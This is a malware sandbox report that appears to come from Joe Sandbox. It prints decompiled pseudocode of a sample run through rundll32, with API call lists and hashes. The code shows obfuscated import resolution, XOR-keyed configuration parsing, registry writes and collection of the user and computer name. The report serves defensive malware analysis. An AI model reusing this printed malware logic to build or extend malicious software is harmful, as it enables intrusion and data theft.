                                          								CloseHandle(_v28);
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0x4fdd238, 0, _t66);
                                          					}
                                          				}
                                          				_t68 = _v16;
                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                          				E04FD147E(_t68);
                                          				goto L12;
                                          			}




















                                          APIs
                                            • Part of subcall function 04FD57D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04FD14AF,?,?,?,?,00000000,00000000), ref: 04FD57FD
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04FD581F
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04FD5835
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04FD584B
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04FD5861
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04FD5877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 04FD14C5
                                          • memset.NTDLL ref: 04FD1500
                                            • Part of subcall function 04FD77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04FD333A,73797325), ref: 04FD77F7
                                            • Part of subcall function 04FD77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04FD7811
                                          • GetModuleHandleA.KERNEL32(4E52454B,07528CEF,73797325), ref: 04FD1536
                                          • GetProcAddress.KERNEL32(00000000), ref: 04FD153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD15A5
                                            • Part of subcall function 04FD684E: GetProcAddress.KERNEL32(36776F57,04FD935F), ref: 04FD6869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04FD1582
                                          • CloseHandle.KERNEL32(?), ref: 04FD1587
                                          • GetLastError.KERNEL32(00000001), ref: 04FD158B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: 7bad90556eef33142061ee3c7cb57ce77857d7625a3144a039e1aa1ba602daa8
                                          • Instruction ID: 5b1d2cc99e0cba5448b418b387f216488c892beb0fa6598ee9f7206ad5a98779
                                          • Opcode Fuzzy Hash: 7bad90556eef33142061ee3c7cb57ce77857d7625a3144a039e1aa1ba602daa8
                                          • Instruction Fuzzy Hash: C1313472D00208EFDB11AFA4DD88E9EBBBEEF04344F144565E606E7111D735AD45DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E04FD4D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				intOrPtr* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t1 = _t9 + 0x4fde62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E04FD6027(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t40 = __imp__;
                                          					_t13 =  *_t40(_t28);
                                          					_v8 = _t13;
                                          					_t41 = E04FD58BE(_v8 +  *_t40(_a4) + 1);
                                          					if(_t41 != 0) {
                                          						strcpy(_t41, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t41, _a4);
                                          						_t36 = E04FD6F33(_t34, _t41, _a8);
                                          						E04FD147E(_t41);
                                          						_t42 = E04FD4759(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E04FD147E(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E04FD4858(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E04FD147E(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
                                          					E04FD147E(_t28);
                                          				}
                                          				return _t36;
                                          			}















                                          APIs
                                            • Part of subcall function 04FD6027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04FD4D46,253D7325,00000000,00000000,74ECC740,?,?,04FD52FE,?), ref: 04FD608E
                                            • Part of subcall function 04FD6027: sprintf.NTDLL ref: 04FD60AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04FD52FE,?,075295B0), ref: 04FD4D57
                                          • lstrlen.KERNEL32(?,?,?,04FD52FE,?,075295B0), ref: 04FD4D5F
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • strcpy.NTDLL ref: 04FD4D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04FD4D81
                                            • Part of subcall function 04FD6F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04FD4D90,00000000,?,?,?,04FD52FE,?,075295B0), ref: 04FD6F4A
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04FD52FE,?,075295B0), ref: 04FD4D9E
                                            • Part of subcall function 04FD4759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04FD4DAA,00000000,?,?,04FD52FE,?,075295B0), ref: 04FD4763
                                            • Part of subcall function 04FD4759: _snprintf.NTDLL ref: 04FD47C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 8042e3eea16833fd4b01377308a3ee890919ccabcb172b2c8920cbb7c734ff89
                                          • Instruction ID: 014e295656df6f565b074ca2a37844d7804a9a680a1f2b0ee3e4bcb54bd01e4e
                                          • Opcode Fuzzy Hash: 8042e3eea16833fd4b01377308a3ee890919ccabcb172b2c8920cbb7c734ff89
                                          • Instruction Fuzzy Hash: E8117373A0166977A7127BB59D44C6F3AAFDE4A65830D0115F505AB100DE34ED0397E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E04FD98F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				signed int _t18;
                                          				signed int _t23;
                                          				void* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char* _t31;
                                          				char* _t32;
                                          				char* _t33;
                                          				void* _t34;
                                          				void* _t35;
                                          				signed int _t41;
                                          				void* _t43;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t62;
                                          				signed int _t66;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t83 = __esi;
                                          				_t80 = __edi;
                                          				_t72 = __ecx;
                                          				_t69 = __ebx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t18 =  *0x4fdd2a0; // 0x59935a40
                                          				if(E04FD96D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                          					 *0x4fdd2d0 = _v12;
                                          				}
                                          				_t23 =  *0x4fdd2a0; // 0x59935a40
                                          				if(E04FD96D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                          					_t28 = 2;
                                          					return _t28;
                                          				} else {
                                          					_push(_t69);
                                          					_t70 = _v12;
                                          					_push(_t83);
                                          					_push(_t80);
                                          					if(_t70 == 0) {
                                          						_t29 = 0;
                                          					} else {
                                          						_t66 =  *0x4fdd2a0; // 0x59935a40
                                          						_t29 = E04FD10CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                          					}
                                          					if(_t29 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                          							 *0x4fdd240 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t30 = 0;
                                          					} else {
                                          						_t62 =  *0x4fdd2a0; // 0x59935a40
                                          						_t30 = E04FD10CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                          					}
                                          					if(_t30 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                          							 *0x4fdd244 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t31 = 0;
                                          					} else {
                                          						_t58 =  *0x4fdd2a0; // 0x59935a40
                                          						_t31 = E04FD10CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                          					}
                                          					if(_t31 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                          							 *0x4fdd248 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t32 = 0;
                                          					} else {
                                          						_t54 =  *0x4fdd2a0; // 0x59935a40
                                          						_t32 = E04FD10CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                          					}
                                          					if(_t32 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                          							 *0x4fdd004 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t33 = 0;
                                          					} else {
                                          						_t50 =  *0x4fdd2a0; // 0x59935a40
                                          						_t33 = E04FD10CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                          					}
                                          					if(_t33 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                          							 *0x4fdd02c = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t34 = 0;
                                          					} else {
                                          						_t46 =  *0x4fdd2a0; // 0x59935a40
                                          						_t34 = E04FD10CA(_t72, _t70, _t46 ^ 0x163b337e);
                                          					}
                                          					if(_t34 != 0) {
                                          						_push(_t34);
                                          						_t43 = 0x10;
                                          						_t44 = E04FDA2EF(_t43);
                                          						if(_t44 != 0) {
                                          							_push(_t44);
                                          							E04FD9B10();
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t35 = 0;
                                          					} else {
                                          						_t41 =  *0x4fdd2a0; // 0x59935a40
                                          						_t35 = E04FD10CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                          					}
                                          					if(_t35 != 0 && E04FDA2EF(0, _t35) != 0) {
                                          						_t86 =  *0x4fdd324; // 0x75295b0
                                          						E04FD4C3A(_t86 + 4, _t39);
                                          					}
                                          					HeapFree( *0x4fdd238, 0, _t70);
                                          					return 0;
                                          				}
                                          			}






























                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD99AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD99DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD9A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD9A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD9AC3
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 1d1281d44aeace05af6cc7d0195cf7ca3050319fbc7b1bc86729383daf75f47c
                                          • Instruction ID: 4ce3a353da5116dcaf8dd73b1dc3d3e7f1d2f1e75fd8bf72ba2bfdadd225fab4
                                          • Opcode Fuzzy Hash: 1d1281d44aeace05af6cc7d0195cf7ca3050319fbc7b1bc86729383daf75f47c
                                          • Instruction Fuzzy Hash: 995162B2B01158EEE710EBF9EE88D5F76EFEB8870476C0915A501D7108F6B5FD428621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 04FD13B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 04FD13C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 04FD13DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD1443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD1452
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD145D
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: cd92ef815e5a014f8353f31e831fab6cd4a427c1c8679a13ce312851a65d200b
                                          • Instruction ID: c8b9ca0b9cd2d59970f6e95ebd8e5b346c7398181277c6ee54229701f5208c4f
                                          • Opcode Fuzzy Hash: cd92ef815e5a014f8353f31e831fab6cd4a427c1c8679a13ce312851a65d200b
                                          • Instruction Fuzzy Hash: C4414E36D00609AFDB01EFF8D944A9FB7BAEF8A301F144425E914EB110DA75ED06CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD57D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E04FD58BE(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t1 = _t23 + 0x4fde11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t2 = _t26 + 0x4fde769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E04FD147E(_t54);
                                          					} else {
                                          						_t30 =  *0x4fdd2a4; // 0x254a5a8
                                          						_t5 = _t30 + 0x4fde756; // 0x614d775a
                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0x4fdd2a4; // 0x254a5a8
                                          							_t7 = _t33 + 0x4fde40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0x4fdd2a4; // 0x254a5a8
                                          								_t9 = _t36 + 0x4fde4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0x4fdd2a4; // 0x254a5a8
                                          									_t11 = _t39 + 0x4fde779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E04FD7B01(_t54, _a8);
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}



















                                          APIs
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04FD14AF,?,?,?,?,00000000,00000000), ref: 04FD57FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04FD581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04FD5835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04FD584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04FD5861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04FD5877
                                            • Part of subcall function 04FD7B01: memset.NTDLL ref: 04FD7B80
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 4eabc64bbbff5d9eb4b26d458c843790a48f89c7bea9b0003b69f757ea0c5aca
                                          • Instruction ID: 72b57a6655f1d05c1e2fdd02c589a6b1d4311d1170150050ba32c70eb8593ff0
                                          • Opcode Fuzzy Hash: 4eabc64bbbff5d9eb4b26d458c843790a48f89c7bea9b0003b69f757ea0c5aca
                                          • Instruction Fuzzy Hash: 072171B1A0270AEFEB10EFB9D844D5AB7EEEF443047085529E548DB250EB74F906CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E04FDA642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				void _v284;
                                          				void* __esi;
                                          				char* _t60;
                                          				intOrPtr* _t61;
                                          				intOrPtr _t65;
                                          				char _t68;
                                          				intOrPtr _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				void* _t78;
                                          				void* _t88;
                                          				void* _t96;
                                          				void* _t97;
                                          				int _t102;
                                          				signed int* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t106;
                                          
                                          				_t97 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t102 = _a16;
                                          				if(_t102 == 0) {
                                          					__imp__( &_v284,  *0x4fdd33c);
                                          					_t96 = 0x80000002;
                                          					L6:
                                          					_t60 = E04FDA5E9(0,  &_v284);
                                          					_a8 = _t60;
                                          					if(_t60 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t61 = _a20;
                                          						if(_t61 != 0) {
                                          							 *_t61 =  *_t61 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t105 = _a24;
                                          					if(E04FD621D(_t97, _t105, _t96, _t60) != 0) {
                                          						L27:
                                          						E04FD147E(_a8);
                                          						goto L29;
                                          					}
                                          					_t65 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t16 = _t65 + 0x4fde8de; // 0x65696c43
                                          					_t68 = E04FDA5E9(0, _t16);
                                          					_a24 = _t68;
                                          					if(_t68 == 0) {
                                          						L14:
                                          						_t29 = _t105 + 0x14; // 0x102
                                          						_t33 = _t105 + 0x10; // 0x3d04fdc0
                                          						if(E04FD4C9A( *_t33, _t96, _a8,  *0x4fdd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                          							_t72 =  *0x4fdd2a4; // 0x254a5a8
                                          							if(_t102 == 0) {
                                          								_t35 = _t72 + 0x4fdea54; // 0x4d4c4b48
                                          								_t73 = _t35;
                                          							} else {
                                          								_t34 = _t72 + 0x4fdea4f; // 0x55434b48
                                          								_t73 = _t34;
                                          							}
                                          							if(E04FD30FC( &_a24, _t73,  *0x4fdd334,  *0x4fdd338,  &_a24,  &_a16) == 0) {
                                          								if(_t102 == 0) {
                                          									_t75 =  *0x4fdd2a4; // 0x254a5a8
                                          									_t44 = _t75 + 0x4fde856; // 0x74666f53
                                          									_t78 = E04FDA5E9(0, _t44);
                                          									_t103 = _t78;
                                          									if(_t78 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t105 + 0x10; // 0x3d04fdc0
                                          										E04FD1BC1( *_t47, _t96, _a8,  *0x4fdd338, _a24);
                                          										_t49 = _t105 + 0x10; // 0x3d04fdc0
                                          										E04FD1BC1( *_t49, _t96, _t103,  *0x4fdd330, _a16);
                                          										E04FD147E(_t103);
                                          									}
                                          								} else {
                                          									_t40 = _t105 + 0x10; // 0x3d04fdc0
                                          									E04FD1BC1( *_t40, _t96, _a8,  *0x4fdd338, _a24);
                                          									_t43 = _t105 + 0x10; // 0x3d04fdc0
                                          									E04FD1BC1( *_t43, _t96, _a8,  *0x4fdd330, _a16);
                                          								}
                                          								if( *_t105 != 0) {
                                          									E04FD147E(_a24);
                                          								} else {
                                          									 *_t105 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t105 + 0x10; // 0x3d04fdc0
                                          					if(E04FD74B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                          						_t104 = _v16;
                                          						_t88 = 0x28;
                                          						if(_v12 == _t88) {
                                          							 *_t104 =  *_t104 & 0x00000000;
                                          							_t26 = _t105 + 0x10; // 0x3d04fdc0
                                          							E04FD4C9A( *_t26, _t96, _a8, _a24, _t104);
                                          						}
                                          						E04FD147E(_t104);
                                          						_t102 = _a16;
                                          					}
                                          					E04FD147E(_a24);
                                          					goto L14;
                                          				}
                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					memcpy( &_v284, _a8, _t102);
                                          					__imp__(_t106 + _t102 - 0x117,  *0x4fdd33c);
                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                          					_t96 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}

                                          APIs
                                          • StrChrA.SHLWAPI(04FD553C,0000005F,00000000,00000000,00000104), ref: 04FDA675
                                          • memcpy.NTDLL(?,04FD553C,?), ref: 04FDA68E
                                          • lstrcpy.KERNEL32(?), ref: 04FDA6A4
                                            • Part of subcall function 04FDA5E9: lstrlen.KERNEL32(?,00000000,04FDD330,00000001,04FD937A,04FDD00C,04FDD00C,00000000,00000005,00000000,00000000,?,?,?,04FD207E,?), ref: 04FDA5F2
                                            • Part of subcall function 04FDA5E9: mbstowcs.NTDLL ref: 04FDA619
                                            • Part of subcall function 04FDA5E9: memset.NTDLL ref: 04FDA62B
                                            • Part of subcall function 04FD1BC1: lstrlenW.KERNEL32(04FD553C,?,?,04FDA818,3D04FDC0,80000002,04FD553C,04FD9642,74666F53,4D4C4B48,04FD9642,?,3D04FDC0,80000002,04FD553C,?), ref: 04FD1BE1
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 04FDA6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 8fae2af3d037a52e805b0851f99ec373deb0569c3e7f1651d5b66529ff1a0fd5
                                          • Instruction ID: f1adbe6acd51c5d28d12bc2e3964ff4dcf97de280d4db1d770ec1c8ec3718710
                                          • Opcode Fuzzy Hash: 8fae2af3d037a52e805b0851f99ec373deb0569c3e7f1651d5b66529ff1a0fd5
                                          • Instruction Fuzzy Hash: 05510E7290020AEFEF12AFA0ED44E9A77BBEF05304F088529F91596160E739E917DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD614A() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E04FD58BE(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E04FD147E(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_t31 = _t56 + 2; // 0x4fd5210
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,04FD520E), ref: 04FD615E
                                          • GetComputerNameW.KERNEL32(00000000,04FD520E), ref: 04FD617A
